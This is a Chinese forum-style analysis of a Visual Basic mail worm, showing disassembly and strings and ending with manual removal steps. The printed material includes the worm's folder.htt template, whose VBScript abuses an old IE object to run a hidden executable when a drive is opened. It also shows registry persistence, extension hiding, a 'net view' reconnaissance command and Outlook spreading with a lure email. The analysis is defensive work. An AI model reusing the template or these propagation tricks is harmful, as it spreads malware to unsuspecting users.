0
文章作者:混世魔王 QQ26836659
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
【申明】我很菜.写的不好,别骂我。文中有错,还请指教。有不足,望补充.谢谢
【作者】混世魔王 [Cai Niao] QQ:26836659
【使用工具】 OD .PEID.GetVBRes.VBExplorer
【破解平台】2000 server
【软件名称】 未知
【申明】我很菜.写的不好,别骂我。文中有错,还请指教。有不足,望补充.谢谢
【内容】朋友系统第三次系统重做了。依然有毒。电脑没有连网,都不知道他做什么坏事染上的。找到了问题文件看了看。
PEID 查壳无壳。VB 写的。用VBEXPLORER 可以编译,那应该就是P-Code。据看雪书中记载,P-Code优点是使得程序不依赖于硬件或操作系统而成为可能。寝室几个人的从2000 到XP 都有这个毒。
0040153C |80264000 DD vc.00402680 ; UNICODE ".com"
00401540 |002D4000 DD vc.00402D00 ; UNICODE "fullpath"
00401544 |542C4000 DD vc.00402C54 ; UNICODE
"HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Cabinet
State"
00401548 |00174000 DD vc.00401700
0040154C |842D4000 DD vc.00402D84 ; UNICODE
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetSt
ate"
00401550 |CC2E4000 DD vc.00402ECC ; UNICODE
"HideFileExt"
00401554 |2C2E4000 DD vc.00402E2C ; UNICODE
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
00401558 |E82E4000 DD vc.00402EE8 ; UNICODE "Hidden"
0040155C |FC2E4000 DD vc.00402EFC ; UNICODE
"HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advance
d"
00401560 |6C264000 DD vc.0040266C ; UNICODE "TempCom"
00401564 |E4254000 DD vc.004025E4 ; UNICODE
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
00401568 |DC164000 DD vc.004016DC
0040156C |48294000 DD vc.00402948 ; UNICODE "Error"
00401570 |38324000 DD vc.00403238 ; UNICODE "\FONTS"
00401574 |90264000 DD vc.00402690 ; UNICODE "1.com"
程序写启动项HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
键值名为“TempCom”。,写系统目录(C:\WINNT\FONTS\),生成一个名称是四位随机名字.com 运行的程序。用时间来运行09:30:00 22:03:36等几个时间控制,到点执行指令。生成文件图标的文件的.exe运行程序,修改文件夹属性为隐藏和隐藏文件的后缀名.2000是默认隐藏文件,但是2003是显示文件名的。
**********Reference To->msvbvm60.rtcShell
|
:00409A27 0A4B000800 ImpAdCallFPR4 ;Call
ptr_004010FC; check stack 0008; Push EAX
:00409A2C 7410FE FStFPR8 ;Fstp#8
[LOCAL_01F0]
:00409A2F 356CFF FFree1Var ;Free
LOCAL_0094
:00409A32 001E LargeBos ;IDE beginning
of line with 1E byte codes
:00409A34 F502000000 LitI4 ;Push 00000002
:00409A39 051800 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\command /c net view >D:\net.txt"
|
:00409A3C 3A4CFF6800 LitVarStr ;PushVarString
ptr_00402AFC
:00409A41 FB946CFF AddVar ;
**********Reference To->msvbvm60.rtcShell
\command /c net view >D:\net.txt net view 是查看内网共享文件想必是要内网传播。
:0040990B 1B3700 LitStr ;Push
ptr_0040274C
:0040990E FEC9 CDateStr ;vbaDateStr
:00409910 080800 FLdPr
;[SR]=[STACK_0008]
:00409913 924400 MemStFPR8 ;
:00409916 002F LargeBos ;IDE beginning
of line with 2F byte codes
:00409918 051800 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\All Users\Start Menu\Programs\苧?\??.scr"
|
:0040991B 3A4CFF6300 LitVarStr ;PushVarString
ptr_004029D8
:00409920 FB946CFF AddVar ;
:00409924 FDFE28FE CStrVarVal ;
:00409928 045CFF FLdRfVar ;Push
LOCAL_00A4
**********Reference To->msvbvm60.rtcFileDateTime
|
:0040992B 0A39000800 ImpAdCallFPR4 ;Call
ptr_004010EA; check stack 0008; Push EAX
:00409930 045CFF FLdRfVar ;Push
LOCAL_00A4
:00409933 FC4F FnCDateVar ;vbaDateVar
:00409935 080800 FLdPr
;[SR]=[STACK_0008]
:00409938 924400 MemStFPR8 ;
:0040993B 2F28FE FFree1Str ;SysFreeString
[LOCAL_01D8]; [LOCAL_01D8]=0
:0040993E 3604006CFF5CFF FFreeVar ;Free 0004/2
variants
:00409945 000F LargeBos ;IDE beginning
of line with 0F byte codes
:00409947 080800 FLdPr
;[SR]=[STACK_0008]
:0040994A 8D4400 MemLdFPR8 ;
:0040994D 793A00 ImpAdLdFPR8 ;
:00409950 D2 LtR8 ;
:00409951 1C130D BranchF ;If Pop=0 then
ESI=00409977
:00409954 0023 LargeBos ;IDE beginning
of line with 23 byte codes
:00409956 051800 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\All Users\Start Menu\Programs\??\??.scr"
|
:00409959 3A4CFF6300 LitVarStr ;PushVarString
ptr_004029D8
:0040995E FB946CFF AddVar ;
:00409962 FDFE28FE CStrVarVal ;
:00409966 080800 FLdPr
;[SR]=[STACK_0008]
:00409969 8A7000 MemLdStr ;Push DWORD
[[SR]+0070]
**********Reference To->msvbvm60.rtcFileCopy
|
:0040996C 0A3F000800 ImpAdCallFPR4 ;Call
ptr_004010F6; check stack 0008; Push EAX
:00409971 2F28FE FFree1Str ;SysFreeString
[LOCAL_01D8]; [LOCAL_01D8]=0
:00409974 356CFF FFree1Var ;Free
LOCAL_0094
:00409977 0002 LargeBos ;IDE beginning
of line with 02 byte codes
:00409979 000D LargeBos ;IDE beginning
of line with 0D byte codes
******Possible String Ref To->"00-1-01 22:03:36"
|
:0040997B 1B3700 LitStr ;Push
ptr_0040274C
:0040997E FEC9 CDateStr ;vbaDateStr
:00409980 080800 FLdPr
;[SR]=[STACK_0008]
:00409983 924400 MemStFPR8 ;
:00409986 001B LargeBos ;IDE beginning
of line with 1B byte codes
******Possible String Ref To->"C:\Documents and Settings\All Users\?縋蕇瞨祎\
硁?\苧?\??.scr"
|
:00409988 1B6400 LitStr ;Push
ptr_00402A30
:0040998B 046CFF FLdRfVar ;Push
LOCAL_0094
msvbvm60.rtcFileCopy 复制自身到多个目录下面。All Users的启动目录。命名为 启动.scr 屏保后缀
%WINDOWS%\All Users\Start Menu\Programs\启动\启动.scr (Win98系统)
C:\Documents and Settings\All Users\[开始]菜单\程序\启动\启动.scr(win2000和winxp系统)
A:\Explorer.EXE
A:\WINDOWS.EXE
004013FC /50334000 DD vc.00403350 ; UNICODE "folder.htt"
00401400 |58A04000 DD vc.0040A058
00401404 |8C274000 DD vc.0040278C ; UNICODE "getfile"
00401408 |9C274000 DD vc.0040279C ; UNICODE "Attributes"
0040140C |68334000 DD vc.00403368 ; UNICODE "Close"
00401410 |74334000 DD vc.00403374 ; UNICODE
"createtextfile"
00401414 |98334000 DD vc.00403398 ; UNICODE "<html>"
00401418 |28274000 DD vc.00402728 ; UNICODE "
"
0040141C |AC334000 DD vc.004033AC ; UNICODE "<head>"
00401420 |DC334000 DD vc.004033DC ; UNICODE "<meta
http-equiv=*content-type* content=*text/html; charset=UTF-8*>"
00401424 |68344000 DD vc.00403468 ; UNICODE "</head>"
00401428 |7C344000 DD vc.0040347C ; UNICODE "<body
style=*margin: 0* scroll=no>"
0040142C |C8344000 DD vc.004034C8 ; UNICODE "<object
id=FileList border=0 tabindex=1"
00401430 |1C354000 DD vc.0040351C ; UNICODE "classid =
*clsid:1820FED0-473E-11D0-A96C-00C04FD705A2*"
00401434 |90354000 DD vc.00403590 ; UNICODE
"style=*width: 100%; height: 100%* tabIndex=-1>"
00401438 |F4354000 DD vc.004035F4 ; UNICODE "</object>"
0040143C |0C364000 DD vc.0040360C ; UNICODE "</body>"
00401440 |20364000 DD vc.00403620 ; UNICODE "</html>"
00401444 |34364000 DD vc.00403634 ; UNICODE "<script
language=vbscript>"
00401448 |5C374000 DD vc.0040375C ; UNICODE
"document.write *<div style='position:absolute; left:0px; top:0px; width:0px;
height:0px; z-index:28;"
0040144C |00394000 DD vc.00403900 ; UNICODE "</script>"
00401450 |18394000 DD vc.00403918 ; UNICODE "On Error
Resume Next"
00401454 |70364000 DD vc.00403670 ; UNICODE "Dim path"
00401458 |88364000 DD vc.00403688 ; UNICODE "Path = **"
0040145C |A0364000 DD vc.004036A0 ; UNICODE "Path =
Left(document.location, Len(document.location) - 11)"
00401460 |1C374000 DD vc.0040371C ; UNICODE "Path =
Mid(Path, 9)+*/*"
00401464 |48394000 DD vc.00403948 ; UNICODE "Set
AppleObject = document.applets(*l*)"
00401468 |9C394000 DD vc.0040399C ; UNICODE
"AppleObject.setCLSID (*{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}*)"
0040146C |203A4000 DD vc.00403A20 ; UNICODE
"AppleObject.createInstance()"
00401470 |603A4000 DD vc.00403A60 ; UNICODE
"sd=*w*+*sshe*+*ll*"
00401474 |8C3A4000 DD vc.00403A8C ; UNICODE "Set sd =
AppleObject.GetObject()"
00401478 |D43A4000 DD vc.00403AD4 ; UNICODE "sd.run(Path
+ exename1)"
00401414 到 00401478 是folder.htt
的内容,查了F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 是利用一个很古老的IE 漏洞。在C.D.E.G 四个盘下写folder.htt .desktop.ini 和windows.exe 这个windows.exe被隐藏后缀明,又是文件夹图标,很极容易认为是文件夹而且运行。 当你访问C.D.E.G 这四个盘的根目录时候就运行病毒文件,也就是你系统重做后,访问其他的盘,病毒又把你刚做的C 盘感染。并且在所有的子目录下生成同名的文件,并且是隐藏属性加folder.htt的访问启动。
:00406E63 0A0E001000 ImpAdCallFPR4 ;Call
ptr_004016E8; check stack 0010; Push EAX
:00406E68 32060068FF64FFE0 FFreeStr ;Do
SysFreeString [arg_n]; [arg_n]=0 0006/2 times ~ arg
:00406E71 36040054FF34FF FFreeVar ;Free 0004/2
variants
:00406E78 F401 LitI2_Byte ;Push 01
:00406E7A 0476FF FLdRfVar ;Push
LOCAL_008A
:00406E7D 6B74FF FLdI2 ;Push WORD
[LOCAL_008C]
:00406E80 FE63DCFE2402 ForI2 ;
:00406E86 2844FF0000 LitVarI2 ;PushVarInteger
0000
:00406E8B 25 PopAdLdVar ;
:00406E8C 0870FF FLdPr
;[SR]=[LOCAL_0090]
:00406E8F FE9A54FF0F000100 LateMemCallLdVar ;
:00406E97 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406E9A FE4E SetVarVarFunc ;
:00406E9C 0476FF FLdRfVar ;Push
LOCAL_008A
:00406E9F FD930240 CDargRef ;
:00406EA3 0404FF FLdRfVar ;Push
LOCAL_00FC
:00406EA6 FF4254FF0B000100 VarLateMemCallLdVar ;
:00406EAE 04BCFE FLdRfVar ;Push
LOCAL_0144
:00406EB1 FE4E SetVarVarFunc ;
******Possible String Ref To->"Mywoman@163.com"
|
:00406EB3 3A44FF1000 LitVarStr ;PushVarString
ptr_004030F8
:00406EB8 25 PopAdLdVar ;
:00406EB9 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EBC FF431100 VarLateMemSt ;
:00406EC0 04BCFE FLdRfVar ;Push
LOCAL_0144
:00406EC3 FF4154FF1200 VarLateMemLdVar ;
:00406EC9 25 PopAdLdVar ;
:00406ECA 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406ECD FF431300 VarLateMemSt ;
:00406ED1 3554FF FFree1Var ;Free
LOCAL_00AC
******Possible String Ref To->"??
??"
|
:00406ED4 3A44FF1400 LitVarStr ;PushVarString
ptr_00403140
:00406ED9 25 PopAdLdVar ;
:00406EDA 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EDD FF431500 VarLateMemSt ;
******Possible String Ref To->"?????
???礑??荈????:)"
|
:00406EE1 3A44FF1600 LitVarStr ;PushVarString
ptr_00402D20
:00406EE6 25 PopAdLdVar ;
:00406EE7 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EEA FF431700 VarLateMemSt ;
:00406EEE 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406EF1 FF4154FF1800 VarLateMemLdVar ;
:00406EF7 04ACFE FLdRfVar ;Push
LOCAL_0154
:00406EFA FE4E SetVarVarFunc ;
:00406EFC 051900 ImpAdLdRf ;Push ptr
******Possible String Ref To->"\??.exe"
|
:00406EFF 3A44FF1A00 LitVarStr ;PushVarString
ptr_00402958
:00406F04 FB9454FF AddVar ;
:00406F08 25 PopAdLdVar ;
:00406F09 04ACFE FLdRfVar ;Push
LOCAL_0154
:00406F0C FD9F LdPrVar ;
:00406F0E FE981B000100 LateMemCall ;
:00406F14 3554FF FFree1Var ;Free
LOCAL_00AC
:00406F17 6344FF LitVar_TRUE ;
:00406F1A 25 PopAdLdVar ;
:00406F1B 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406F1E FF431C00 VarLateMemSt ;
:00406F22 04CCFE FLdRfVar ;Push
LOCAL_0134
:00406F25 FF4154FF1300 VarLateMemLdVar
总结:典型一个邮件病毒程序写启动项HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
键值名为“TempCom”。,写系统的字体路径(C:\WINNT\FONTS\),生成一个名称是四位随机名字.com 运行的程序。用时间来运行09:30:00 22:03:36等几个时间控制,到点执行指令。生成文件图标的文件的.exe运行程序,修改文件夹属性为隐藏和隐藏文件的后缀名.2000是默认隐藏文件,但是2003是显示文件名的。
\command /c net view >D:\net.txt net view 是查看内网共享文件想必是要内网传播。
msvbvm60.rtcFileCopy 复制自身到多个目录下面。All Users的启动目录。命名为 启动.scr 屏保后缀
%WINDOWS%\All Users\Start Menu\Programs\启动\启动.scr (Win98系统)
C:\Documents and Settings\All Users\[开始]菜单\程序\启动\启动.scr (win2000.2003和winxp系统)
A:\Explorer.EXE A:\WINDOWS.EXE
在C.D.E.G 四个盘下写folder.htt启动 .desktop.ini 和windows.exe 这个windows.exe被隐藏后缀明,又是文件夹图标,很极容易认为是文件夹而运行。
当你访问C.D.E.G 这四个盘的根目录时候就运行病毒文件,也就是你系统重做后,访问其他的盘,病毒又把你刚做的C 盘感染。并且在所有的子目录下生成同名的文件,并且是隐藏属性加folder.htt的访问启动。
程序会利用本机的 Outlook 进行网络传播。
邮件
form:Mywoman@163.com //应该是病毒的作者吧.
to:你outlook的好友
标题: 美女
内容:这是一个关于美女的故事,请看附件吧
生成一个:美女.exe 的附件
分析了他的运行原理,手工删吧。根据病毒的运行时间搜索那段时间所有的改动文件,程序程序还会毒中含毒.释放一个Win32.Parite.A 版的病毒,感染本机器所有的可执行文件,郁闷,好多游戏都坏了。还好有in32.Parite.A 的专杀工具,安全模式杀了我2个小时.
tu[1] [2] [3] 下一页 |
用户登录 
新用户注册
文章评论(评论内容只代表网友观点,与本站立场无关!) 【发表评论】
苏ICP备05042773号